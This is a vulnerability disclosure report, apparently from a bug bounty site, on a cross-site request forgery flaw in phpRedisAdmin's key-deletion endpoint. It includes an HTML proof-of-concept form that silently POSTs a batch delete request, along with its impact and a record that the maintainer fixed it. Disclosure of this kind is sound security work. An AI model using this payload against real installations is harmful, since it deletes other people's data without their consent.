Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021

✍️ Description

The delete key functionality in the application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected&#95;keys" value="123&#44;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability can let an attacker delete data from the database without the knowledge/interaction of the user.

Occurrences

index.php L1

References

Cross-site request forgery (CSRF)

We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago

Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago

Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation